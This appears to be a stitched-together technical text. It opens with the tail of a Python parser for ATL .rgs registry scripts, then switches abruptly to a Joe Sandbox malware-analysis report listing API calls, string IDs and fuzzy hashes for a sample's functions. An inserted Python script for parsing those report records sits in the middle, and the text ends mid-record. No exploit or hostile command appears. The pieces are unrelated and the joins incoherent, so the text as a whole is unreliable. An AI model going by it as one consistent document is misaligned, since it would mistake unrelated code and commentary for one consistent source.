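        if mode == "forceremove":               # ForceRemove: wipe, then recreate
            ops.append(("delete_key", sub, "", ""))
        ops.append(("create_key", sub, "", "noremove" if mode == "noremove" else ""))
        if i < len(toks) and toks[i] == ("sym", "="):
            i, data = parse_value(toks, i, subst)
            ops.append(("set_value", sub, "", data))   # default value of the key
        if i < len(toks) and toks[i] == ("sym", "{"):
            i = parse_block(toks, i, sub, ops, subst)
    if i >= len(toks):
        raise ValueError(f"unterminated block under {path}")
    return i + 1


def parse(text: str, subst: Optional[Dict[str, str]] = None) -> List[Op]:
    subst = subst or {}
    toks = tokenize(text)
    ops: List[Op] = []
    i = 0
    while i < len(toks):
        root = ROOTS.get(toks[i][1].upper()) if toks[i][0] == "word" else None
        if root is None:
            raise ValueError(f"expected a root key, got {toks[i][1]!r}")
        i = parse_block(toks, i + 1, root, ops, subst)
    return ops


def destructive_ops(ops: List[Op]) -> List[Op]:
    """The deletions a registration run performs (ForceRemove and Delete entries)."""
    return [o for o in ops if o[0] == "delete_key"]


def unregister_keys(ops: List[Op]) -> List[str]:
    """Keys ATL removes on unregistration: every created key not marked NoRemove, deepest first."""
    return [o[1] for o in reversed(ops) if o[0] == "create_key" and o[3] != "noremove"]


if __name__ == "__main__":
    for op in parse(SAMPLE_RGS, {"MODULE": r"C:\Example\example.dll"}):
        print(op)
```

Braces count as syntax only when they stand alone as a token, which is how the usual one-brace-per-line layout of .rgs files reads, so a `{GUID}` key name is not confused with a block. The deletions returned by `destructive_ops` are the part worth checking first when such a routine runs with elevated rights, because ForceRemove wipes a key and its subkeys before recreating it.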
                                Similarity
                                • API ID:
                                • String ID: $CrashReport.dll$E$L$L$P$P$W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                • API String ID: 0-1806678545
                                • Opcode ID: 0a6a548e8bdc20afd2ce68292e80a03c9196dcf4a7353b167b4aef734bcb2bdb
                                • Instruction ID: 2d2fd1696cb9a11b1d54eaca7a4e0fd4c7847b6d7041376ab4959040b79c7eec
                                • Opcode Fuzzy Hash: 0a6a548e8bdc20afd2ce68292e80a03c9196dcf4a7353b167b4aef734bcb2bdb
                                • Instruction Fuzzy Hash: 03E1C4B1E052A89EF720CA24DC447EABAB5EF51314F0480FAD44CA7681D67E0FD58F66
                                Similarity
                                • API ID:
                                • String ID: 7$7$A$J28;$V$_R$a$c$i$l$l$l$o$r$t$u
                                • API String ID: 0-1200273302
                                • Opcode ID: 28ba7fbba3feb0cead49acf312b846af2c6be0a3097d648dea64c9067175bc85
                                • Instruction ID: b47088309b577f7c50cf058c335edba89fd58862b3e482b340e0a04e71949f29
                                • Opcode Fuzzy Hash: 28ba7fbba3feb0cead49acf312b846af2c6be0a3097d648dea64c9067175bc85
                                • Instruction Fuzzy Hash: 0DC12571D082A48EF7208624DC84BEA7BB5EF91314F0441FAD48D9B282D77D5FC28B66
                                Similarity
                                • API ID:
                                • String ID: 7$7$A$J28;$V$_R$a$c$i$l$l$l$o$r$t$u
                                • API String ID: 0-1200273302
                                • Opcode ID: 1478cf694196ca9b350df43d916b710f63da0de0c4049037703d7dd154c96519
                                • Instruction ID: 6a6821eb800bc17307eb9a5ec330426600e786462c0f6a262b46102692df8cb9
                                • Opcode Fuzzy Hash: 1478cf694196ca9b350df43d916b710f63da0de0c4049037703d7dd154c96519
                                • Instruction Fuzzy Hash: 5CC1D471D082A88EF7208724DC84BEA7BB5EF91314F1441FAD48D97282D7795FC28B66
                                Strings
                                Similarity
                                • API ID:
                                • String ID: CGB>$CrashReport.dll$L$L$NFAF$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 0-2975757544
                                • Opcode ID: eac9a8c89c20c730b821d41ff1d73c862a32a5d1deaca93cfb33df2c4e0a530f
                                • Instruction ID: c3fc6b31299b4ff0d883bf28e2f011910b9e91c0d681c6d53ca398b40e37eec5
                                • Opcode Fuzzy Hash: eac9a8c89c20c730b821d41ff1d73c862a32a5d1deaca93cfb33df2c4e0a530f
                                • Instruction Fuzzy Hash: A2D1DDB0D091688BEB24CB14CC90BEAB7B6AF85304F1481EAD50DA7742D2795FD2CF46
                                Strings
                                Similarity
                                • API ID:
                                • String ID: CGB>$CrashReport.dll$L$L$NFAF$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 0-2975757544
                                • Opcode ID: d10fddae31009e03eeeb6f156b61e872a3f9cdd0c8a31fb12ca3dd6dc8f7b315
                                • Instruction ID: 222e1c32f40c1fa7557b5a4b6e74b342b59b81caba43ebd11db7046d890ecc55
                                • Opcode Fuzzy Hash: d10fddae31009e03eeeb6f156b61e872a3f9cdd0c8a31fb12ca3dd6dc8f7b315
                                • Instruction Fuzzy Hash: 62A13670D091988AEB20CB24CC947EABB75EF46304F1480EEC94DA7682D6795FC5CF56
                                Strings
                                Similarity
                                • API ID:
                                • String ID: $CrashReport.dll$E$P$P$c$e$i$o$r$s$s$t$x
                                • API String ID: 0-3554693867
                                • Opcode ID: 7fc3e6264b1054c1455f561d4706910a5e0b1591009595303363064f7f158b39
                                • Instruction ID: 5ead059eaa7cd9a067d0d8ed639daa6005f14ddb8a8e090dcf56ebaa6fb9b4a1
                                • Opcode Fuzzy Hash: 7fc3e6264b1054c1455f561d4706910a5e0b1591009595303363064f7f158b39
                                • Instruction Fuzzy Hash: 9A32EDB1E052689FEB20CA14DC84BEABBB5EF85314F0440FAD80DA6681D7795FC18F56
                                Strings
                                Similarity
                                • API ID:
                                • String ID: $CrashReport.dll$E$P$P$c$e$i$o$r$s$s$t$x
                                • API String ID: 0-3554693867
                                • Opcode ID: bbe065e44803fceb44910dd713dd737582de35f73896f6804351aca1609d64bb
                                • Instruction ID: 6d92df309adc330b37f7ccbb712304135bdbf154322a6cc1afe4e9e412da2afb
                                • Opcode Fuzzy Hash: bbe065e44803fceb44910dd713dd737582de35f73896f6804351aca1609d64bb
                                • Instruction Fuzzy Hash: 5422F1B2D052689EFB208A24DC84BEAB7B5EF94314F0441FAD80CA6681D37D5FC58F56
                                Strings
                                Similarity
                                • API ID:
                                • String ID: CGB>$CrashReport.dll$L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 0-2874655421
                                • Opcode ID: 634296a12868fe64c444dd1a69aa1a87964b2178c4ef8a4b1c10bf87dd00030f
                                • Instruction ID: 28573b431104de714659e14005bc12ea8d4cedfd95a2f1439b6d5c9cc77b15a0
                                • Opcode Fuzzy Hash: 634296a12868fe64c444dd1a69aa1a87964b2178c4ef8a4b1c10bf87dd00030f
                                • Instruction Fuzzy Hash: E9E1EF70D052688BEB60CB14CC90BEAB7B6EF85304F1481EAD80CA7342DA795ED5CF56
                                Strings
                                Similarity
                                • API ID:
                                • String ID: CGB>$CrashReport.dll$L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 0-2874655421
                                • Opcode ID: ef59bf22e05791a33724f3ed629b16e6f991e9f2a5fdbdc59e71daa04ad1fb63
                                • Instruction ID: 15585694ee10a1af81d3344b63c63003f30c9683754b990a81afad693c7aaae2
                                • Opcode Fuzzy Hash: ef59bf22e05791a33724f3ed629b16e6f991e9f2a5fdbdc59e71daa04ad1fb63
                                • Instruction Fuzzy Hash: BAD13471D082A89BE720CB24DC94BEB7B75EF82304F1480FAD84C96642D6795EC6CF56
                                Strings
                                Similarity
                                • API ID:
                                • String ID: $CrashReport.dll$E$P$P$c$e$i$o$r$s$s$t$x
                                • API String ID: 0-3554693867
                                • Opcode ID: 1cd384cfedf5098ace8ea5216cae827cfe3210be41f4b8d5cb514916e501c877
                                • Instruction ID: 2ed12cd81298c9345680a260f68604c3c016c5ff2124f8e24448ea315dcded80
                                • Opcode Fuzzy Hash: 1cd384cfedf5098ace8ea5216cae827cfe3210be41f4b8d5cb514916e501c877
                                • Instruction Fuzzy Hash: 0ED1C0B1E052A88EEB20CA24DC547EABBB1EF51304F1440FAD84CAA681D67D5FC5CF56
                                Strings
                                Similarity
                                • API ID:
                                • String ID: CGB>$CrashReport.dll$L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 0-2874655421
                                • Opcode ID: 706b7ac295f89db17e70667ec3c733dcfd7490300e0e2b5d44a24442ab6ae808
                                • Instruction ID: 92f5c4d632993d2955ae432ad90fb1a8f41d132a6a9c79ee99be0bf5b94c74d7
                                • Opcode Fuzzy Hash: 706b7ac295f89db17e70667ec3c733dcfd7490300e0e2b5d44a24442ab6ae808
                                • Instruction Fuzzy Hash: 5FC12371D092689AEB20CB24DC94BEB7BB5EF82304F1480FAD80C97642D6795EC5CF56
                                Strings
                                Similarity
                                • API ID:
                                • String ID: CGB>$CrashReport.dll$L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 0-2874655421
                                • Opcode ID: 8e8d9158ca9b8abab3a3b774b4b52a3f924db1011733c6d65a5399ab46df8f72
                                • Instruction ID: 2b818438b28575bd9d6757f77d77d774293a2b07f6e30c91a71e44f65a72ce33
                                • Opcode Fuzzy Hash: 8e8d9158ca9b8abab3a3b774b4b52a3f924db1011733c6d65a5399ab46df8f72
                                • Instruction Fuzzy Hash: B9B144B1D082989BE7208B24DC44BEA7B75EF81304F1481FAD84D96282D6BD4EC6CF56
                                Strings
                                Similarity
                                • API ID:
                                • String ID: A$J28;$V$_R$a$c$i$l$l$l$o$r$t$u
                                • API String ID: 0-4041529859
                                • Opcode ID: c7450f78a140988aafbe20effae2c912bb7a2aeda3910e8f9251d5a6e1c219e1
                                • Instruction ID: 003180d38f77cc8803a351203a56c8e9cbafbc388e8f12235da44feb45b75d57
                                • Opcode Fuzzy Hash: c7450f78a140988aafbe20effae2c912bb7a2aeda3910e8f9251d5a6e1c219e1
                                • Instruction Fuzzy Hash: 03A1F2B1D082648EF7208B24DC84BEA7BB5EF81314F1480FED44D97682D6795FC18B66
                                Strings
                                Similarity
                                • API ID:
                                • String ID: A$J28;$V$_R$a$c$i$l$l$l$o$r$t$u
                                • API String ID: 0-4041529859
                                • Opcode ID: 48a71ff226f7c8b23cdaa05fc023dd6ca970369c303e6648c1c65ee50e03d9b4
                                • Instruction ID: 4232c71923d7ff96c5d4261595b4d506814e236fc931062ee2a06c6d669e28f4
                                • Opcode Fuzzy Hash: 48a71ff226f7c8b23cdaa05fc023dd6ca970369c303e6648c1c65ee50e03d9b4
                                • Instruction Fuzzy Hash: DF91C271E082648EF7208B24DC94BEA7BB5EF91314F1440FAD44D9B282D7795FC18B66
                                Strings
                                Similarity
                                • API ID:
                                • String ID: A$J28;$V$_R$a$c$i$l$l$l$o$r$t$u
                                • API String ID: 0-4041529859
                                • Opcode ID: 51a5462b0a0d234f005479872fe2b4ef8c0471cf4fb9cf407325ce1734e3bd93
                                • Instruction ID: e0eb7f884e8821d0944b33b22deaa3c5efca6b21bc5b3fbf50a19b8caf8ce7c4
                                • Opcode Fuzzy Hash: 51a5462b0a0d234f005479872fe2b4ef8c0471cf4fb9cf407325ce1734e3bd93
                                • Instruction Fuzzy Hash: 959114B1E082A48EE7208625DC94BEA7BB5EF91314F1480FAD48D97281D6794FC1CB67
                                Strings
                                Similarity
                                • API ID:
                                • String ID: A$J28;$V$_R$a$c$i$l$l$l$o$r$t$u
                                • API String ID: 0-4041529859
                                • Opcode ID: a842a74a3559f796a02ef51823d2bc317834c95b7d762b6a44aa06129246b5b3
                                • Instruction ID: 5e8891abed41657f7e989aadf462fdff952da4f4b7056756378e3675ff061b49
                                • Opcode Fuzzy Hash: a842a74a3559f796a02ef51823d2bc317834c95b7d762b6a44aa06129246b5b3
                                • Instruction Fuzzy Hash: F1910671E082A48EE7208624DC947EA7BB6EF91314F1480FAD48D97282D6795FC1CB66
                                Strings
                                Similarity
                                • API ID:
                                • String ID: A$J28;$V$_R$a$c$i$l$l$l$o$r$t$u
                                • API String ID: 0-4041529859
                                • Opcode ID: 95c483703ca303077823e4826ff1c2655350a0e84919372891e95e0b2db9a442
                                • Instruction ID: df58a994ca3e62e78a3978717fc5b382f7e4bc14de4042cd30d801fb280ed65f
                                • Opcode Fuzzy Hash: 95c483703ca303077823e4826ff1c2655350a0e84919372891e95e0b2db9a442
                                • Instruction Fuzzy Hash: 4781D371E082548EF7208624DC94BEBBBB5EF91314F1480FAD48D97282D77D5EC18B66
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID:
                                • String ID: CrashReport.dll$E$P$P$c$e$i$o$r$s$s$t$x
                                • API String ID: 0-670065755
                                Strings
                                Similarity
                                • API ID:
                                • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 0-4069139063
                                Strings
                                Similarity
                                • API ID:
                                • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 0-4069139063
                                Strings
                                Similarity
                                • API ID:
                                • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 0-4069139063
                                Strings
                                Similarity
                                • API ID:
                                • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 0-4069139063
                                Strings
                                Similarity
                                • API ID:
                                • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 0-4069139063
                                Strings
                                Similarity
                                • API ID:
                                • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 0-4069139063
                                Strings
                                Similarity
                                • API ID:
                                • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 0-4069139063
                                Strings
                                Similarity
                                • API ID:
                                • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 0-4069139063
                                Strings
                                Similarity
                                • API ID:
                                • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 0-4069139063
                                APIs
                                • FindResourceW.KERNEL32(?,0000006C,UIDATA,1D1D1D8C,?,00000008,?), ref: 00470497
                                • LoadResource.KERNEL32(?,00000000), ref: 004704B5
                                • SizeofResource.KERNEL32(?,00000000), ref: 004704D2
                                • FreeResource.KERNEL32(00000000), ref: 004704E4
                                • _memset.LIBCMT ref: 00470523
                                • LockResource.KERNEL32(00000000), ref: 0047052C
                                • FreeResource.KERNEL32(00000000), ref: 00470827
                                Strings
                                Similarity
                                • API ID: Resource$Free$FindLoadLockSizeof_memset
                                • String ID: UIDATA
                                • API String ID: 22797042-37798676
                                APIs
                                • GetCurrentThreadId.KERNEL32 ref: 0047A66A
                                • OpenThread.KERNEL32(00000040,00000001,-00000008,00000000,?,?,?,?,?,?,?,0047A5C0,?,00475D38,00000000,00000000), ref: 0047A6C5
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,0047A5C0,?,00475D38,00000000,00000000,00000CCC,00000040), ref: 0047A6CB
                                • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,0047A5C0,?,00475D38,00000000,00000000,00000CCC,00000040), ref: 0047A6FA
                                • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,0047A5C0,?,00475D38,00000000,00000000,00000CCC), ref: 0047A704
                                • OutputDebugStringW.KERNEL32(****** ,?,?,?,?,?,?,?,0047A5C0,?,00475D38,00000000,00000000,00000CCC,00000040), ref: 0047A711
                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,0047A5C0,?,00475D38,00000000,00000000,00000CCC,00000040), ref: 0047A71A
                                Strings
                                Similarity
                                • API ID: HeapThread$CloseCurrentDebugErrorFreeHandleLastOpenOutputProcessString
                                • String ID: ******
                                • API String ID: 2450575844-1974978773
                                APIs
                                • _memset.LIBCMT ref: 0047E6B7
                                • GetVersionExW.KERNEL32 ref: 0047E6D2
                                • GetVersionExW.KERNEL32(?), ref: 0047E6E5
                                • GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 0047E6F5
                                • GetProcAddress.KERNEL32(00000000), ref: 0047E6FC
                                Strings
                                Similarity
                                • API ID: Version$AddressHandleModuleProc_memset
                                • String ID: GetNativeSystemInfo$kernel32.dll
                                • API String ID: 3011030232-192647395
                                APIs
                                • GetProcessHeap.KERNEL32(1D1D1D8C), ref: 0047A10A
                                • HeapLock.KERNEL32(00000000), ref: 0047A130
                                • HeapWalk.KERNEL32(00000000,?), ref: 0047A14A
                                • HeapWalk.KERNEL32(00000000,?), ref: 0047A17E
                                • HeapUnlock.KERNEL32(00000000), ref: 0047A192
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: Heap$Walk$LockProcessUnlock
                                • String ID:
                                • API String ID: 2227978497-0
                                • Opcode ID: 81c1e659d896c1b8b40812ab09a17c939bf94fdb85d8e5b5ee7bdaf731dcfabe
                                • Instruction ID: bbe46ce4e01aed47a1f70f3d08ba4753ccc444e6a795538b985fec849003399e
                                • Opcode Fuzzy Hash: 81c1e659d896c1b8b40812ab09a17c939bf94fdb85d8e5b5ee7bdaf731dcfabe
                                • Instruction Fuzzy Hash: 6C21D1325083419FE311DF29D844A9FB7E8EBC5661F80462FF84593390D739A945CBAB
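The per-function records on this page all follow one layout (APIs, Strings, Memory Dump Source, Joe Sandbox IDA Plugin, Similarity), which makes them straightforward to load into a script for pivoting on API call lists, image base and fuzzy hashes across samples. The following Python is an added example, not code from the Joe Sandbox report or its tooling. Its sample input is constructed from the HeapWalk entry directly above, trimmed to a single Associated dump and with the page's glued-on "Download File" link text kept so the parser has to strip it. Section names, the bullet glyph and the field labels are taken exactly as rendered here; the record-boundary rule (a new record starts at the first section header after an "Instruction Fuzzy Hash" line) is an assumption drawn from this page's layout, not a documented report format.

```python
from __future__ import annotations
import re
from dataclasses import dataclass, field

SECTIONS = ("APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity")
LINK_RESIDUE = "Download File"  # link text the page renderer glues onto each "Associated:" dump name
API_RE = re.compile(r"^(?P<name>\w+)\.(?P<module>[\w.]+)\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-Fa-f]+)$")
SRC_RE = re.compile(r"^Source File: (?P<file>\S+), Offset: (?P<base>[0-9A-Fa-f]+), based on PE: (?P<pe>\w+)$")

# Constructed sample: the HeapWalk record from this page, cut down to one Associated dump.
SAMPLE = """\
APIs
• GetProcessHeap.KERNEL32(1D1D1D8C), ref: 0047A10A
• HeapLock.KERNEL32(00000000), ref: 0047A130
• HeapWalk.KERNEL32(00000000,?), ref: 0047A14A
• HeapWalk.KERNEL32(00000000,?), ref: 0047A17E
• HeapUnlock.KERNEL32(00000000), ref: 0047A192
Memory Dump Source
• Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_Week11.jbxd
Similarity
• API ID: Heap$Walk$LockProcessUnlock
• String ID:
• API String ID: 2227978497-0
• Opcode ID: 81c1e659d896c1b8b40812ab09a17c939bf94fdb85d8e5b5ee7bdaf731dcfabe
• Instruction ID: bbe46ce4e01aed47a1f70f3d08ba4753ccc444e6a795538b985fec849003399e
• Opcode Fuzzy Hash: 81c1e659d896c1b8b40812ab09a17c939bf94fdb85d8e5b5ee7bdaf731dcfabe
• Instruction Fuzzy Hash: 6C21D1325083419FE311DF29D844A9FB7E8EBC5661F80462FF84593390D739A945CBAB
"""

@dataclass
class ApiCall:
    name: str
    module: str
    args: tuple[str, ...]
    ref: int  # virtual address of the call site, as printed after "ref:"

@dataclass
class FunctionRecord:
    apis: list[ApiCall] = field(default_factory=list)
    strings: list[str] = field(default_factory=list)
    source_file: str = ""
    image_base: int = 0
    associated: list[str] = field(default_factory=list)
    snapshot: str = ""
    similarity: dict[str, str] = field(default_factory=dict)
    complete: bool = False  # True once the closing "Instruction Fuzzy Hash" line was seen

    def api_names(self) -> list[str]:
        return [a.name for a in self.apis]

    def tokens(self, key: str) -> list[str]:
        """'API ID' / 'String ID' values are '$'-joined tokens; an empty value gives []."""
        return [t for t in self.similarity.get(key, "").split("$") if t]

def parse_records(text: str) -> list[FunctionRecord]:
    """Assumed boundary rule: a section header after a closing hash line opens a new record."""
    records: list[FunctionRecord] = []
    cur, section = FunctionRecord(), None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            if cur.complete:
                records.append(cur)
                cur = FunctionRecord()
            section = line
            continue
        if not line.startswith("•"):
            continue  # blank lines and page chrome are ignored
        body = line[1:].strip()
        if section == "APIs" and (m := API_RE.match(body)):
            args = tuple(m["args"].split(",")) if m["args"] else ()
            cur.apis.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16)))
        elif section == "Strings":
            cur.strings.append(body)
        elif section == "Memory Dump Source" and (m := SRC_RE.match(body)):
            cur.source_file, cur.image_base = m["file"], int(m["base"], 16)
        elif section == "Memory Dump Source" and body.startswith("Associated:"):
            name = body.split(":", 1)[1].strip()
            cur.associated.append(name[: -len(LINK_RESIDUE)].rstrip() if name.endswith(LINK_RESIDUE) else name)
        elif section == "Joe Sandbox IDA Plugin" and body.startswith("Snapshot File:"):
            cur.snapshot = body.split(":", 1)[1].strip()
        elif section == "Similarity":
            key, _, value = body.partition(":")
            cur.similarity[key.strip()] = value.strip()
            cur.complete = cur.complete or key.strip() == "Instruction Fuzzy Hash"
    if cur.complete or cur.apis or cur.source_file:
        records.append(cur)
    return records

def find_calling(records: list[FunctionRecord], api: str) -> list[FunctionRecord]:
    """Records whose call list includes `api`, e.g. every function that walks the process heap."""
    return [r for r in records if api in r.api_names()]

if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        print(hex(rec.image_base), rec.snapshot, rec.api_names(), rec.tokens("API ID"))
```

Feeding the whole function listing through `parse_records` and then `find_calling(records, "HeapWalk")` or a lookup on `similarity["Instruction Fuzzy Hash"]` is the quickest way to pull the heap-walking routine (or any other API pattern) out of several hundred records and to compare its fuzzy hash against other samples.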
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: _memcpy_s
                                • String ID: date$logs$path$version
                                • API String ID: 2001391462-1468544551
                                • Opcode ID: ffeedcf09fd024d02930604d4351f1d9c4e20f5f3bc065c2dab0befd4e08b293
                                • Instruction ID: 78fcfeb3040343104aede56ec2e0158854f21d25d4d16607a0e9590502c573f4
                                • Opcode Fuzzy Hash: ffeedcf09fd024d02930604d4351f1d9c4e20f5f3bc065c2dab0befd4e08b293
                                • Instruction Fuzzy Hash: 70026C75D00258CFDB14CF99C884ADDBBB2FF85304F2981AEC40A6B356D774AA49CB91
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 29590a81b3251fca5755b7757f13a5cb89c93322baddac7ebbf6560387a82461
                                • Instruction ID: 6cab1a8e8fef37a9c9f4059041024890a40a3f1f8d344ed13e853b53ff9a7377
                                • Opcode Fuzzy Hash: 29590a81b3251fca5755b7757f13a5cb89c93322baddac7ebbf6560387a82461
                                • Instruction Fuzzy Hash: C8F0313150010EBBDF017F71DC0C9AF3B6DAB90394B048926F91595160EB38DA96EB99
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: date$logs$path
                                • API String ID: 0-3116124417
                                • Opcode ID: 133996de80c348e9e78970d64dc1b6be4ecb56c10107aac29467756af1daac31
                                • Instruction ID: 9328a4e24000ddc87a463375ed416296aa69c017df2c73b6a2e59af4a77eedd7
                                • Opcode Fuzzy Hash: 133996de80c348e9e78970d64dc1b6be4ecb56c10107aac29467756af1daac31
                                • Instruction Fuzzy Hash: D9E16B75D002588FEB08CF95C8846DDBBB2FF85304F2981AEC50A6B356D774AA49CB91
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: date$logs$path
                                • API String ID: 0-3116124417
                                • Opcode ID: ec7cae6e4f198182df5be47fd8c01c696eba71d10eca4738416a41d04dbed728
                                • Instruction ID: 9e8fb5e346565543a85397cbcd1c4803d80c2448331f02fea9e916978b3e101d
                                • Opcode Fuzzy Hash: ec7cae6e4f198182df5be47fd8c01c696eba71d10eca4738416a41d04dbed728
                                • Instruction Fuzzy Hash: D2E16B75D00258CFDB08CF95C8846DDBBB2FF85304F2981AEC50A6B356D774AA49CB91
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
